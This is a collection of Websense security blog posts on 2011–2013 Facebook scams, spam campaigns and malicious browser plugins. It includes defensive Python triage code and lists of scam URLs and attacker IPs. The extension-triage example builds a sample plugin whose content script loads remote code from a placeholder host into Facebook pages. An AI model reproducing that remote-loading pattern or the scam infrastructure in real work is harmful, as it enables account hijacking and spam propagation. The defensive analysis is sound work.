2013 Threat Report: More Than Scary Stats and Chilling Charts
Posted: 13 Feb 2013 08:30 AM

The 2013 Threat Report from the Websense® Security Labs™ is now available.

 

The report details mobile, social, email and web-based threats, and while it is full of ominous data points, it is a very interesting read. The report is designed to help security professionals keep current with threat trends and improve the effectiveness of existing security solutions. It can also be used to identify and prioritize security gaps that may require new approaches and more innovative strategies.

 

Creating the report began with the Websense ThreatSeeker® Network, composed of big data clusters used by the WSL to collect and manage up to 5 billion inputs each day from 900 million global endpoints. Malware samples, mobile applications, email content, web links and other information were then passed through deep analysis processes including Websense ACE (Advanced Classification Engine), which applied over 10,000 different analytics.

 

Here is a sampling of key findings from this year's report:

 

  1. Web Security. The web became significantly more malicious in 2012, both as an attack vector and as the primary support element of attacks originating through social media, mobile devices, and email. Researchers measured an alarming 600 percent increase in the use of malicious web links through all vectors.
  2. The Social Web. Malicious content was hidden within social media behind shortened web links 32 percent of the time. Social media attacks took advantage of the confusion of new features, changing services and unsophisticated users.
  3. Mobile Security. A study of last year's malicious apps revealed how they often abuse permissions; especially in the use of SMS communications, something very few legitimate apps do. Risks also increased as mobile devices were used for social media and web surfing more often than actually making a phone call.
  4. Email Security. Only 1 in 5 emails sent were legitimate, as spam increased to 76 percent of email traffic, and 92% of spam included links to potentially malicious content. Phishing threats delivered via email also grew.
  5. Malware Behavior. Forensic analysis identified that registry modification behavior in malware has declined to 7.7%. Once a key indicator of malicious behavior, it has given way to malware that is increasingly Internet-connected: half of all malware used the Internet for communications and downloaded additional malicious executables to extend its attack capabilities within the first 60 seconds.
  6. Data Theft. Key changes in data theft targets and methods took place last year. Reports of intellectual property (IP) theft increased, and theft of credit card numbers and other Personally Identifiable Information (PII) continued to grow. Hacking, malware and other cyber-threats continued to be common methods of attack. However, some of the largest thefts involved physical penetration of security as well, often by willful employees.

 

Because today's attacks occur in multiple stages through numerous vectors, the report includes an appendix on The Seven Stages of Advanced Threats. This methodology for analyzing and classifying cyber-attacks provides a useful framework for organizations to assess their current defenses against their security profile, identify weaknesses and develop a more comprehensive strategy for withstanding next-generation attacks. A summary of the Websense 2013 Security Predictions report is also included for planning purposes.

 

 

Click for a video introduction or download a copy of the 2013 Threat Report.

'Jacked Frost' Facebook Scam Goes Wild and Doubles Over the Weekend
Posted: 10 Dec 2012 11:51 AM

Last week we wrote a blog about a Facebook scam that appeared to spread rather aggressively. We decided to nickname the scam "Jacked Frost." The Websense® ThreatSeeker® network detected that the scam has increased and multiplied over the weekend, particularly on Saturday, where we saw the number of unique URLs related to this scam double. This shows how cyber crooks time their attacks for periods when users are more relaxed and the security community is less likely to alert users to this type of threat.

 

Here is the link to our blog that describes this in more detail. The scam spreads using click-jacking techniques and employs a mass number of varied scam hosts by using the infrastructure of the legitimate service at freedns.afraid.org.

 

Websense customers are protected against this threat with Websense ACE (Advanced Classification Engine).

 

A graph showing the volume of unique scam URLs vs. active URLs (available URLs) over the past few days:


Screenshot of the scam's main page:

 

 

What the scam looks like in Facebook's news feed. The scam uses a variety of sexually suggestive images and enticing wording to lure users into clicking:

 

Christmas-Themed Facebook Scams: How Cybercrooks Kick it up a Notch and Piggyback on Big Brands
Posted: 07 Dec 2012 07:03 PM

From time to time the Websense® ThreatSeeker® Network detects high volume surges of badness rolling across Facebook. In the past 48 hours we've seen a rapid increase of a particular scam campaign that has aggressively spread through the world's largest social networking site. 

 

With the holiday shopping season here, it appears that cybercrooks are going full throttle to attract Christmas shoppers by piggybacking on the reputation of well-known brands such as Walmart, Asda, Visa, Best Buy, Apple and others. In the attack that we're about to describe, it appears that user accounts belonging to the free DNS service freedns.afraid.org were used as part of the cybercriminals' scam infrastructure. Read on for details.

 

The scam varies in appearance, is geolocation aware, and serves content based on the location of the victim. Potential victims are enticed with videos and free shopping vouchers. Here are some examples of how it might look in a Facebook news feed:

 

The scam in a Facebook news feed 

What happens when a scam post is clicked?

 

When a scam link is clicked in the news feed, the victim is redirected to a fake Facebook page that hosts a fake video that pretends to show the "Fail Blog Daily Video." A clickjacking technique is employed on the page so that when the victim clicks on the video's play button, it results in one of two outcomes:

 

1. A browser popup is launched and the victim is asked to "Like" a certain scam post. This is done to propagate the scam further because liking it causes it to appear on the victim's news feed.
(Click here to see what it looks like; a new browser window will open.)

 

2. The victim is redirected to a fake video page that uses the CPA advertising method to "unlock" what is supposedly a YouTube video.
(Click here to see what it looks like; a new browser window will open.)


This isn't the end, though. The page also has a timeout mechanism.  If the victim doesn't play the video they are greeted with a "Merry Christmas!" message and are redirected to a fake Facebook page offering some fake free vouchers.  In the following example, some fake Asda vouchers are offered:

 

Christmas-themed congratulation:

 

The scam is geolocation aware:


Here is a scam page offering some free vouchers from Asda.  This particular page is designed for UK-based visitors:


This scam page offers vouchers and rewards from Walmart, Best Buy and Visa.  This particular page is designed for US-based visitors:


This scam page offers vouchers and rewards from Walmart and American Express.  This particular page is designed for US-based visitors:


As mentioned, the scam comes in many variations and piggybacks on the reputation of many well-known brands. Let's have a look at the example from above that piggybacks on Asda. The fake voucher page for Asda takes the victim through the scam step by step. First, in order to get the free voucher the victim has to share the voucher in their Facebook profile. Second, the victim must publish the comment "Thanks Asda!" to support the scam. Lastly, the user must click the Like button, which is a scam link.  

 

After the victim completes the steps, their Facebook news feed includes the fake voucher scam and they are redirected to a legitimate website at new.activeyou.co.uk that gives out prizes and supports an affiliate program. The way this works is that any user who comes to the site through a certain affiliate and participates earns the affiliate some money; there is no free voucher after all. The affiliate here obviously engages in illegal methods to advertise and generate traffic to a website that earns them money. The affiliate ID is seen in the next image, marked in red in the URL where it states affid.

 

No free vouchers after all:


The scam infrastructure and intelligence: accounts on Afraid.org as doorways

 

Websense's partnership with Facebook alerts us and invites us to assist Facebook in mitigating such scams using Websense ACE. We released this blog because we saw a spike in our data feeds and a rather large number of different URLs that are used for scam purposes that have a relation to each other. We think that Facebook is doing a good job of cleaning up and removing posts related to this scam.

 

We spotted more than 3,000 unique URLs used for this scam on Facebook.  The high variation is used by cyber criminals to assure persistence and redundancy in case some URLs or domains get blacklisted.

 

The scam peak as seen by the ThreatSeeker Network. This plots the number of new hosts seen hosting the scam vs. the number of active hosts using this scam.

 

One of the most interesting findings is that most of the scam hosts used in the attack use the DNS servers of the free service at freedns.afraid.org. Essentially, we found that all the name-server records used by websites involved in the attack use Afraid.org's DNS servers and point to ns1.afraid.org (see illustration below).

 

freedns.afraid.org is a free service that offers domain owners free DNS services. For example, a domain owner can use the DNS servers of freedns.afraid.org and have them point to their website's IP address. freedns.afraid.org also allows users to manage those free DNS services via an account. It allows account holders to add various subdomains to their main domain and optionally point those new websites to different IP addresses. For example, if John Doe owns johndoe.com on IP address x.x.x.x, he can go to freedns.afraid.org, create an account, and use their DNS servers to point to his website's IP address at x.x.x.x. On top of that, John can easily add DNS records for subdomains of his main website (johndoe.com) via his account at freedns.afraid.org. At his option, John can have those subdomains (which essentially represent different web sites) point to different IP addresses. So, for example, John can use his DNS account with freedns.afraid.org to have johnsfriend.johndoe.com point to y.y.y.y.

 

Scam host example and its DNS record:  91037997396662norryyoutubecomplay10pegahihypupegahihypu.opbco.web74.net


In this attack, accounts/hosts on freedns.afraid.org have been used to serve scam URLs by pointing subdomains of legitimate hosts to the attackers' infrastructure. If we examine some of the scam hosts involved in the attack, we can see that they point to a different IP address than the one used at the host level. Websites at the host level vary in purpose and appear to be legitimate. We verified that this pattern is consistent across all of the approximately 3,000 instances that we found involved in the attack. In the next example, the scam URL is hosted on an IP address that the cybercriminals use for the scam (213.152.170.193), while the host itself is hosted on a different IP address serving a legitimate website (65.96.116.101), in this case a personal cooking blog:
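The subdomain-versus-parent mismatch described above can be checked mechanically. The following is an added example, not Websense tooling: it takes an injectable resolver (here a constructed table mirroring the urbancooking.net case from this post, with the scam subdomain label invented for illustration and RFC 5737 addresses for the control case) and flags hosts whose A record is disjoint from their parent domain's while the zone's name servers sit under afraid.org.

```python
"""Flag scam hosts that hide under legitimate parent domains.

Added example, not Websense tooling. The post describes two indicators:
the scam subdomain resolves to an address different from its parent
domain's, and the zone's name servers are the free afraid.org service.
Resolution is injected through a callable so the constructed sample below
runs offline; in practice `lookup` would wrap dnspython or the system
resolver.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, FrozenSet, List, Optional, Tuple

# A resolver maps (name, record type) to a list of record strings, [] if none.
Resolver = Callable[[str, str], List[str]]

# Name-server suffixes treated as "free DNS provider"; the post names ns1.afraid.org.
FREE_DNS_NS_SUFFIXES: Tuple[str, ...] = ("afraid.org",)


@dataclass
class Finding:
    host: str
    parent: str
    host_ips: List[str]
    parent_ips: List[str]
    nameservers: List[str]
    reasons: List[str] = field(default_factory=list)


def parent_domain(host: str) -> Optional[str]:
    """Drop the left-most label; None when the host already has only two labels.

    Assumption: no public-suffix handling (so foo.co.uk would wrongly yield co.uk).
    """
    labels = host.strip(".").split(".")
    if len(labels) < 3:
        return None
    return ".".join(labels[1:])


def analyse_host(host: str, lookup: Resolver) -> Finding:
    """Compare a host's A record with its parent's and inspect the parent's NS."""
    parent = parent_domain(host) or host
    host_ips = lookup(host, "A")
    parent_ips = lookup(parent, "A")
    nameservers = lookup(parent, "NS")
    finding = Finding(host, parent, host_ips, parent_ips, nameservers)

    if host_ips and parent_ips and not set(host_ips) & set(parent_ips):
        finding.reasons.append("subdomain A record disjoint from parent domain")
    if any(ns.rstrip(".").endswith(FREE_DNS_NS_SUFFIXES) for ns in nameservers):
        finding.reasons.append("zone served by free DNS provider name servers")
    return finding


def triage(hosts: List[str], lookup: Resolver,
           known_bad_ips: FrozenSet[str] = frozenset()) -> List[Finding]:
    """Analyse each host; add a reason when it lands on an IP already seen hosting the scam."""
    findings = []
    for host in hosts:
        finding = analyse_host(host, lookup)
        if known_bad_ips & set(finding.host_ips):
            finding.reasons.append("resolves to an IP already seen hosting the scam")
        findings.append(finding)
    return findings


def suspicious(finding: Finding) -> bool:
    """The IP mismatch is the key signal; the NS check alone only says 'free DNS user'."""
    return any(r.startswith("subdomain A record disjoint") for r in finding.reasons)


# Constructed sample zone data mirroring the post: urbancooking.net (a cooking
# blog) on 65.96.116.101, its zone served by afraid.org, and a scam subdomain
# (label invented here) pointing at the scam host 213.152.170.193. The example.com
# entries use RFC 5737 documentation addresses as a clean control case.
SAMPLE_ZONE: Dict[Tuple[str, str], List[str]] = {
    ("urbancooking.net", "A"): ["65.96.116.101"],
    ("urbancooking.net", "NS"): ["ns1.afraid.org.", "ns2.afraid.org."],
    ("www.urbancooking.net", "A"): ["65.96.116.101"],
    ("xmas-voucher.urbancooking.net", "A"): ["213.152.170.193"],
    ("example.com", "A"): ["192.0.2.10"],
    ("example.com", "NS"): ["ns.example.net."],
    ("www.example.com", "A"): ["192.0.2.10"],
}


def sample_lookup(name: str, rrtype: str) -> List[str]:
    """Offline resolver over the constructed table."""
    return list(SAMPLE_ZONE.get((name.rstrip(".").lower(), rrtype), []))


if __name__ == "__main__":
    hosts = ["xmas-voucher.urbancooking.net", "www.urbancooking.net", "www.example.com"]
    for f in triage(hosts, sample_lookup, frozenset({"213.152.170.193"})):
        flag = "SUSPICIOUS" if suspicious(f) else "ok"
        print(f"{flag:10} {f.host} -> {f.host_ips} (parent {f.parent} -> {f.parent_ips}); "
              f"{'; '.join(f.reasons) or 'no findings'}")
```

Only the subdomain pointing at the scam host is flagged; the legitimate www record under the same afraid.org-served zone is not, which is the distinction the post relies on.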


urbancooking.net appears to be a personal blog about cooking:

 

Exploring other websites hosted on the offending 213.152.170.193 reveals more scam websites:


Here are some of the offending IP addresses found to be part of the scam infrastructure hosting the scam websites:


We believe that this attack is now under control and is being successfully mitigated by Facebook. We're seeing a gradual decline in incidences, but it's safe to say that while it's declining it's still going strong. We're going to keep an eye on events related to this attack and keep you in the loop.

 

We would also like to take this opportunity to wish you a merry and cybersafe holiday season.

 

Elad Sharf

Black Friday/Cyber Monday Survival Guide
Posted: 23 Nov 2012 09:00 AM


Many of our colleagues, customers and readers will by now have enjoyed their fill of turkey and pumpkin pie for Thanksgiving and are preparing for a second day of festivities with the arrival of Black Friday.  For North American retailers and consumers this traditionally marks the start of the holiday shopping season, and although many do not observe it as a national holiday, more and more retailers across the globe are launching Black Friday promotions in order to entice consumers and increase sales.  Additionally, given that Black Friday is typically a physical 'bricks-and-mortar' retail affair, online retailers seek to continue the shopping frenzy with additional offers, promotions and sales on Cyber Monday, a marketing term coined in 2005 by Shop.org.


Of course, retailers and consumers are not alone in their preparations for the shopping period and here at Websense® Security Labs™, the Websense ThreatSeeker® Network continues to detect and protect customers from numerous malicious campaigns that look to exploit bargain hunters and shoppers throughout this period.

 

Malicious campaigns detected and blocked thus far predominantly play upon Black Friday themes to spam-promote scam websites offering loans, fake degrees and the like. We also see scams that entice victims to complete survey scams in order to harvest personal information.

 

In addition to wearing appropriate clothing and footwear as well as remembering to drink sufficient amounts of water, Security Labs presents our Black Friday/Cyber Monday Survival Guide:

#1 "If it looks too good to be true..."
Large retailers may offer knock-down prices and fantastic first-come-first-served deals; however, think twice before clicking on that email link or completing that purchase on that 'new' website you've just found.


Fake websites are created by scammers to entice buyers using terminology such as 'wholesale prices' or 'liquidated stock'. Combine this with a Black Friday or Cyber Monday deal and you could be convinced that you've just secured the latest gadget at a fraction of the retail price. In reality, you're handing over your payment details to a scammer who will at best only charge you for the fictitious goods.

Apple products for less than half the retail price... Really?

 

These scams are unfortunately not limited to dedicated scam websites, and individual fictitious products infiltrate well-known online retailers and auction sites. Successfully purchasing bargains through third-party sellers via a retailer's 'marketplace' or an online auction is common practice; however, apply rule #1 and consider rule #2.

Remember: "If it looks too good to be true... it probably is"


#2 "It takes many good deeds to build a good reputation..."
Many interactions in our everyday lives rely on reputation and our online interactions should be no different. Just because an email claims to be from a particular retailer or organization it doesn't mean that it is. Many online retailers have spent a great deal of time and effort building their reputation and are unlikely to dilute their brand by sending emails from free webmail accounts or creating websites on obscure URLs.

If you have suspicions regarding an email or link, don't follow it. Go directly to the organization's website before logging in or making a purchase, and don't be afraid to contact an organization to verify the validity of something you've received.

Suspicious URLs can also be checked using our ACEInsight Site Analysis tool, a free service powered by the Websense TRITON™ architecture that will perform a real-time security and content classification check.

 

If you're submitting any personal information online, note that many retailers use additional security features such as HTTPS and Extended Validation (EV) certificates, evident from a padlock icon and the organization name appearing in green in the address bar. These indicate that additional verification steps have been taken and confirm the authenticity of the website you're visiting. If you're making an online purchase or submitting personal or financial information, these measures also help to secure your data in transit and protect it from prying eyes (man-in-the-middle attacks).


Reputation confirmed by an Extended Validation Certificate



If you're considering a purchase from a marketplace seller or online auction remember to review ratings or feedback and confirm that they are reputable. Additionally, avoid using payment methods outside of the marketplace or auction site as these are common scam traits - not only are you likely to fall outside of any payment protection schemes, many scammers will encourage you to use money transfer methods that are difficult to track and recover.

Remember: "It takes many good deeds to build a good reputation, and only one bad one to lose it." - Benjamin Franklin


#3 "Loose lips..."
It's possible that not even your closest friend knows your date of birth (for those of us above a certain age), your mother's maiden name or indeed the name of your first goldfish let alone your PIN, card verification code and credit-card number! Given this, think carefully before surrendering this information and be suspicious of any email, website or social network post that requests personal and/or financial information... you may find that your details are being used to fund someone else's shopping-spree!

 

Phishing campaigns, as shown in our recent Insights Blog, are most popular on Mondays and Fridays, which just so happens to tie in with this weekend's busy shopping period. Financial organizations and retailers are highly unlikely to ask you to 'Verify your account' or 'Unlock your account' and then have you submit all of your personal details again. If in doubt, visit the organization's website directly or contact them via alternate means to confirm their request.

 

If you're submitting any personal information online, confirm the reputation (rule #2) of the organization. Will they be protecting your data and using it for its intended purpose? Or is this a ruse to gather personal information for further spam/scam campaigns or even identity theft?

Remember: "Loose lips sink ships!"


#4 "There's no such thing as a free lunch..."

As is often the case when invited to lunch with family members, we may pay a small price for lunch by fixing that printer problem or removing malware from the abused family PC... a small price compared to the time and effort required to put the meal in front of you. In the case of scammers, the free lunch, or more to the point the 'free gift card' or 'free hugely popular consumer electronic device', is offered in return for simply filling in an online survey or completing a qualifying purchase in order to secure that vastly more expensive item.

 

Commonly these scams utilize emails and social network posts claiming to be from popular brands, informing you that 'You have received a gift card from us' or announcing a 'Giveaway'. The links, of course, if not leading you to malicious websites that could potentially compromise your machine, lead you through a series of sites to harvest your personal information and/or entice you into purchasing memberships, ebooks and other items, all in order to secure that great freebie.  Once harvested, your data at best could be passed to marketing organizations to further target you, or at worst used for identity fraud.

 

Free iPad?

 

Free giftcard?

 

Ask yourself the question, would the brand really give away high-value gift-cards and goods in return for a completed survey? Whilst prize draws and money-off coupons are common rewards, consider our other survival guide tips before answering the question.

Remember: "There's no such thing as a free lunch... somebody has to pay"


#5 "Attachment is the great fabricator of illusions..."

Here in Security Labs, we've seen, blogged about, and protected customers from countless malicious email campaigns which misuse popular brand identities to entice trusting consumers to open malicious attachments which then lead to the compromise of their machines. Whilst no specific examples of Black Friday / Cyber Monday malicious emails are being detected at the time of writing, this attack vector could easily be exploited to take advantage of those of us waiting for an all-important email laden with shopping bargains.

 

However enticing, interesting or compelling an email attachment looks - don't open it unless you are sure of its source.

Attached order confirmations or coupons may appear to be legitimate, particularly when you're placing a number of orders online. Confirm that these are related to transactions that you've made and consider the behavior. Is it normal for this particular retailer to send you the order confirmation as an attachment rather than within the actual email?

Remember: "Attachment is the great fabricator of illusions; reality can be attained only by someone who is detached." - Simone Weil

 

#6: "The hair is real..."

Those of you camping outside stores awaiting the bargain stampede are sure to be using mobile devices to stay up-to-date with the latest offers and news... but how do you keep on top of numerous retailers and offers? A quick search on any mobile application store or marketplace is sure to reveal any one of a number of apps that will take care of this task for you, aggregating numerous news feeds, offers and store deals into one handy app. The question is, can you trust it? As seen with the launch of many high-profile mobile games and applications, attackers exploit mobile users by publishing fake applications which may give you a little more than you've bargained for... perhaps premium-rate SMS, or just harvesting personal data from your smartphone.

 

Before installing any application, be sure to check the permissions that it's requesting. Does a simple offer app really need the ability to modify or delete items on your smartphone's storage card? How about integrating with your phone book? If in doubt, don't install it. And, of course, check the reviews to confirm that the app's reputation is trustworthy.

Remember: "The hair is real; it's the head that's fake." - Steve Allen

 

#7: "I alone cannot change the world..."

In the sense of community and coming together, please do leave a comment and share anything suspicious you encounter this weekend. Whilst we've prepared this survival guide, albeit in a light-hearted fashion, for Black Friday and Cyber Monday, these threats and our guidelines are relevant throughout the year. Enjoy your shopping and stay safe. And by all means drop us a line if you find any real 'highly desirable consumer electronic gadgets' at knock-down prices!

Remember: "I alone cannot change the world, but I can cast a stone across the waters to create many ripples." - Mother Teresa

 

Unsolicited Secret Admirers Via Email
Posted: 02 Oct 2012 12:47 AM

 

The Websense® ThreatSeeker® Network has detected an unsolicited email campaign in which love-struck or curious recipients may have their appetites whetted by the thought of a secret admirer. Although Websense customers are protected from this and other threats by ACE™, our Advanced Classification Engine, this post provides an insight into the campaign, which appears to be on the increase today.

 

The messages, sent from various Yahoo.com accounts, suggest that the sender has "to let you know how [they] feel" and provide an enticing Facebook link to "View Your Ecard".


As displayed above, a valid short Facebook URL is used which, in this case, redirects to hxxp://www.facebook.com/pages/32942390324/536822983001617?sk=app_190322544333196. This particular page, which appears to have been created today (October 1, 2012), makes use of a third-party Facebook app 'Static HTML App.' This app embeds the following code:


The code sends a 'signedRequest' string (as seen in the highlighted URL above), which then requests the desired content for rendering in the victim's browser. In this case, a basic JavaScript is delivered:


The victim's browser is then directed to a fake ecard site hxxp://readyourecard.com/viewmessage/?a=vip36 which, according to Whois data, was registered on September 20, 2012 by 'Liu Hongmei' in China:


At this point, the aim of the campaign becomes clear: Every link on the fake ecard page redirects to an affiliate landing page on the Adult Dating website AdultFriendFinder.com and, with affiliate earnings of up to $1 per unique visitor, you can easily see how such a campaign could become very lucrative!


This campaign appears to be financially driven, but it is conceivable that the same techniques could be used to direct victims to malicious sites. Given that the redirection starts from an innocent-looking Facebook page, users should consider themselves warned to tame their curiosity and not click on unsolicited links!


Beware of scams related to Facebook Timeline!
Posted: 05 Jan 2012 08:26 PM

First it was the Cheesecake Factory; now, it’s Timeline. Facebook, like many other social networking companies, is experiencing some user dissatisfaction, and scammers are taking advantage of anti-Timeline sentiment. According to Insidefacebook, scammers are creating pages that assure the public that by “liking” the page, watching the linked video, downloading a certain browser application, or inviting their friends to the page, they will be allowed to opt out of Timeline.

 

These pages all ask readers to "Like" the account, and some even ask them to subscribe. Some pages ask readers to install a browser application; Google Chrome and Firefox are common targets of such scams. Though some Facebook pages may look harmless, remember that being cautious is the best way to prevent potential data loss.

 

Timeline was introduced by Mark Zuckerberg during the F8 developer conference. There, he announced that the beta version of the interface would be available to Facebook users on September 22nd. 

 

So, what is Timeline? Facebook engineers implemented an algorithm that gathers all of your Facebook activity and organizes it based on what it deems important: your birth, high school graduation, first job, wedding, special events, and so on. The Timeline profile page is divided into two columns that contain recent photos, games, posts, and other activity. Since the algorithm decides what is relevant and what is not, there is a chance an event or a post you think is relevant might not show up in Timeline.  But fear not, the new page layout will allow editing so that users can manually change what information is shared or deemed important. 

 

Facebook employee Paul McDonald explains that Timeline allows users to add details of their lives before Facebook was created, providing an easy way to rediscover things once shared in real life. You have seven days to review and modify the timeline before it goes live and anyone else can see it. 

 

As long as Facebook remains the top social networking site, scammers will use new and innovative methods to try to steal and exploit user information, but rest assured that ACE  (Advanced Classification Engine) protects our customers from such scams.

 

Devi

Facebook launches new features
Posted: 29 Dec 2011 09:26 PM

 

Timeline

A while back, we blogged about some upcoming changes on Facebook. The new Timeline layout is now ready for release. All Facebook accounts will be updated to the new Timeline layout on December 29, 2011.

You may already have noticed changes in some profiles. Timeline has been accessible to all users for a while, giving them the choice to publish or simply modify their Timelines prior to the December 29 release. 

 

We're interested to know what you think of these new Facebook features. Please enter your comments at the bottom of this blog post. 
And keep in mind that Websense technology can protect your Timeline from spam, malicious links, and unwanted comments.
(Read here about the security partnership with Facebook that we announced in October.) 

 

Sponsored Stories

In January 2012, Facebook users will start to see their photos appear in third-party advertisements in News Feeds. Facebook’s new “Sponsored Stories” feature will appear in the Ticker section – a feature released earlier this year and located on the right-hand side of the Facebook page.

Users will see targeted Sponsored Stories based on their friends' and their own “Page likes,” check-ins, app shares, games played, and so on. These stories are visible only to people who are already eligible to see your News Feed story.

 

For example, if you own a small business and you want people to hear about you, you can pay to have activity posted in the Sponsored Stories column. These postings are based only on the actions of users' friends. Your business is more credible because the link comes from a friend.

Facebook will implement this feature slowly, starting with one advertisement per day per user. According to a Facebook spokesperson, up to 10% of the stories appearing in the Ticker will be Sponsored Stories.

As the leading web content classification and security firm, and as a security partner with Facebook, Websense tracks these trends closely. We do not see increased security risks based on Sponsored Stories, but let us know what you think.

 

Elisabeth Olsen

Facebook scams kick it up a notch with Firefox/Chrome plugins
Posted: 20 Dec 2011 06:12 AM

Scams on Facebook are a daily thing. The Websense® ThreatSeeker® Network recently detected some Facebook scams that now utilize the power of browser extensions to spread to other users' profiles. Scam pages typically utilize social engineering tricks, like enticing users with videos or offers of a free voucher, all of which lure victims into taking part in the scam. Now, on top of that, we've found that victims are also asked to install a browser plugin. The plugin is an integral part of how the scam is spread. Once installed, the plugin connects to a script that uses the Facebook API and then posts the scam to the victim's friends' pages. One of the advantages of using a plugin is the ability to persist in the victim's browser and propagate to other profiles, which is similar to malicious Facebook applications we've seen before.

We have noticed that at the moment, only Chrome and Firefox plugins are used. This is how a sample scam page looks using Chrome and Firefox browsers respectively:


The code checks which browser is installed and serves the compatible malicious plugin. Chrome plugin files end with a CRX file extension and Firefox plugin files end with the XPI file extension. Chrome and Firefox plugin files come in a compressed form. Looking inside these malicious plugins reveals some code that loads a script from external websites. This code is ultimately loaded by the browser that connects to Facebook. The code posts in the victim's name on the victim's friends pages, which results in the victim further spreading the scam, spam, and possibly malware. To see the code behind the plugin of the scam shown above, take a look at these next images:  

[Screenshots: the plugin's source code]

Here is another example of a scam with the same concept. The next two images show a 'Cheesecake Factory' voucher scam offering to download a Chrome plugin, and how the scam looks in Facebook's news feed:

[Screenshots: the 'Cheesecake Factory' voucher scam page and the resulting news feed post]

Websense Advanced Classification Engine, or ACE, helps protect users from such scams.
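A defender triaging one of these plugins wants to know two things before anything else: what the package is allowed to do, and where it fetches code from at run time. The Python below is an added example, not the scam's own files and not Websense code. It strips the CRX container (version 2 or 3; an XPI is a plain ZIP, and a classic XPI carries install.rdf rather than manifest.json, so for it only the bundled scripts are scanned), reads the Chrome manifest's permissions and content-script targets, searches the bundled scripts for remote script sources, and raises review notes when a script that runs on facebook.com pulls its payload from another host. The sample package it builds, including the placeholder host scam-host.example and the dummy key and signature, is constructed for the demonstration.

```python
"""Static triage of a Chrome .crx or Firefox .xpi package: what it may do and
where it loads code from. Added example; the sample package is constructed."""
import io
import json
import re
import struct
import zipfile
from urllib.parse import urlparse

# Matches `x.src = "http://..."` in JS and <script src="http://..."> in HTML.
SCRIPT_SRC_RE = re.compile(
    r"""(?:\.src\s*=\s*|<script[^>]*?\bsrc\s*=\s*)['"](https?://[^'"\s]+)['"]""", re.I)


def crx_to_zip(data: bytes) -> bytes:
    """Return the ZIP payload of a CRX (v2 or v3); an XPI is already a ZIP."""
    if data[:4] != b"Cr24":
        return data
    version = struct.unpack("<I", data[4:8])[0]
    if version == 2:      # magic, version, key len, sig len, key, sig, zip
        key_len, sig_len = struct.unpack("<II", data[8:16])
        return data[16 + key_len + sig_len:]
    if version == 3:      # magic, version, header len, protobuf header, zip
        hdr_len = struct.unpack("<I", data[8:12])[0]
        return data[12 + hdr_len:]
    raise ValueError(f"unsupported CRX version {version}")


def inspect_extension(data: bytes) -> dict:
    """Collect permissions, content-script targets and remote script sources."""
    findings = {"permissions": [], "content_script_matches": [], "remote_scripts": set()}
    with zipfile.ZipFile(io.BytesIO(crx_to_zip(data))) as zf:
        names = zf.namelist()
        if "manifest.json" in names:   # Chrome; a classic XPI uses install.rdf instead
            manifest = json.loads(zf.read("manifest.json"))
            findings["permissions"] = list(manifest.get("permissions", []))
            for cs in manifest.get("content_scripts", []):
                findings["content_script_matches"].extend(cs.get("matches", []))
        for name in names:
            if name.endswith((".js", ".html", ".xul")):
                text = zf.read(name).decode("utf-8", "replace")
                findings["remote_scripts"].update(SCRIPT_SRC_RE.findall(text))
    findings["remote_scripts"] = sorted(findings["remote_scripts"])
    return findings


def assess(findings: dict) -> list:
    """Turn findings into review notes; a non-empty list means a human should look."""
    notes = []
    targets_fb = any("facebook.com" in m for m in findings["content_script_matches"])
    external = [u for u in findings["remote_scripts"]
                if not (urlparse(u).hostname or "").endswith("facebook.com")]
    if external:
        notes.append("loads code at runtime from " + ", ".join(external))
    if targets_fb and external:
        notes.append("content script runs inside facebook.com pages and executes that remote code")
    broad = {"tabs", "<all_urls>", "http://*/*", "https://*/*"} & set(findings["permissions"])
    if broad:
        notes.append("broad permissions: " + ", ".join(sorted(broad)))
    return notes


# Constructed sample package (not the scam's real files): a manifest that targets
# facebook.com and a content script that pulls its payload from a placeholder host.
SAMPLE_MANIFEST = {
    "name": "Free Voucher", "version": "1.0", "manifest_version": 2,
    "permissions": ["tabs", "https://www.facebook.com/*"],
    "content_scripts": [{"matches": ["https://www.facebook.com/*"], "js": ["content.js"]}],
}
SAMPLE_CONTENT_JS = """
var s = document.createElement('script');
s.src = 'http://scam-host.example/post.js';   // placeholder host, constructed
document.head.appendChild(s);
"""


def build_sample_crx() -> bytes:
    """Wrap the sample files in a CRX v2 container with a dummy key and signature."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", json.dumps(SAMPLE_MANIFEST))
        zf.writestr("content.js", SAMPLE_CONTENT_JS)
    key, sig = b"\x00" * 8, b"\x00" * 8   # a real CRX carries an RSA key and signature here
    return b"Cr24" + struct.pack("<III", 2, len(key), len(sig)) + key + sig + buf.getvalue()


if __name__ == "__main__":
    for note in assess(inspect_extension(build_sample_crx())):
        print("-", note)
```

The same `inspect_extension()` call works on a real .crx or .xpi read from disk; the review notes are deliberately coarse, since the point of the triage is to decide quickly whether the package deserves a full look, not to prove it malicious.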



Elad Sharf

"Lost Weight" Spam Campaign Spreading on Facebook and ibibo
Posted: 15 Dec 2011 11:20 PM

The Websense® ThreatSeeker® Network has detected a new spam campaign spreading on Facebook and ibibo (a popular game site in India). The content of the spam messages is: "Lost 30 pounds in just 4 weeks all thanks to hcg. Check it out: http://spam_url".

We have seen a number of similar spam campaigns on Facebook, such as the "Sexiest Video Ever" and "Osama bin Laden" scams. But unlike previous campaigns, which took advantage of a hot topic to lure visitors into clicking the link in the spam post, here the attackers also publish a comment in the name of the account owner: "Never thought losing weight could be so easy!!!". With this method, some of the account owner's friends can be tricked into clicking the spam link:

[Screenshot: the spam post and the comment published in the account owner's name]

For the Facebook version of the attack, the attackers abused the blogspot.com service. Here are some of the URLs used for the attack:

http://learn-how-to-be-thinghhfwi.blogspot.com

http://learn-how-to-be-thing3lk8o.blogspot.com

http://find-out-how-to-be-thing5nuhl.blogspot.com

http://find-out-how-to-be-thingpmgbg.blogspot.com

http://learn-how-to-be-thingiihfz.blogspot.com

http://learn-how-to-be-thing4m4wr.blogspot.com

http://learn-how-to-be-thingrebrl.blogspot.com

http://learn-how-to-get-thingqvg34.blogspot.com

http://learn-how-to-be-thing0jk0h.blogspot.com

http://find-out-how-to-get-thingczign.blogspot.com

The spam link redirects victims to another spam site. At the moment, the spam site is unavailable, but the attackers can always update the sites with malicious content.

http://ad2ac.com/?s=15yy1

http://zcwqa2.com/?s=15yy2

The spam links used on ibibo point to newly registered sites, which are also currently unavailable:

http://diet-news.m9q.report.qfz.htttp96.com/

http://diet-news.1tc.report.n8e.httpai.com/

http://diet-news.gxf.report.wxb.htttp92.com/

http://diet-news.ejp.report.3ok.http1m.com/

http://diet-news.z1o.report.yl9.httpv1.com/

